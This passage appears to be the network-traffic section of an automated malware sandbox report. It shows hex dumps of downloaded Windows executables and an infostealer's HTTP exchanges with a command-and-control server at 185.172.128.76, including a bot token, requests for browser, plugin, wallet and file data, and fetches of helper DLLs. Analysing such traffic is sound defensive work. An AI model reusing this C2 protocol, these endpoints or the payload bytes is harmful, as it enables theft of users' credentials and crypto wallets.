40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Apr 2024 00:20:22 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Apr 2024 00:20:51 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /v2/track HTTP/1.1Content-Type: application/x-json-streamContent-Encoding: gzipHost: westus2-2.in.applicationinsights.azure.comContent-Length: 850Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBHost: 185.172.128.76Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 45 31 42 46 37 46 41 32 32 34 37 39 36 39 32 32 37 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="hwid"22E1BF7FA224796922796------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="build"default10------DHCAAEBKEGHJKEBFHJDB--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"browsers------DAFIEHIEGDHIDGDGHDHJ--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="message"plugins------DHCAAEBKEGHJKEBFHJDB--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDBKFHIJKJKECAAAECAHost: 185.172.128.76Content-Length: 6179Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDAHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAAHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 2d 2d 0d 0a Data Ascii: ------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="file"------ECBGIEHDBAAFIDGDAAAA--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file"------CGHCGIIDGDAKFIEBKFCF--
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKEGDGCGDAKEBFIJECGHost: 185.172.128.76Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="message"wallets------FCAFIJJJKEGIECAKKEHI--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCBHost: 185.172.128.76Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 37 39 38 34 64 36 32 36 38 37 61 34 32 63 64 39 35 31 39 63 61 36 39 62 66 63 36 39 65 63 35 38 36 37 38 30 34 62 33 39 30 62 35 33 30 61 35 37 30 36 65 61 37 39 30 38 38 63 33 64 33 36 62 35 36 66 63 62 37 37 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 2d 2d 0d 0a Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"7c7984d62687a42cd9519ca69bfc69ec5867804b390b530a5706ea79088c3d36b56fcb77------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="message"files------GHCGDAFCFHIDBGDHCFCB--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAECFHJEBAAFIEBGHIIEHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIJDGIEBKKFHJKJKEGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJEBAAECBGDHIECAKJKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHDHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAECGIEBKJKEBGDHDAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHJJECBKKECFIEBGCAKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBAKKKFBFHIDGIIEHHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIJDGIJJKEGIEBGCGDHCHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBAHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCAKKEGCAAFHJJJDBKHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBFBAEBKJKEBGCAEHCHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDHDAAEHIEHIECBKJDGHost: 185.172.128.76Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJHost: 185.172.128.76Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
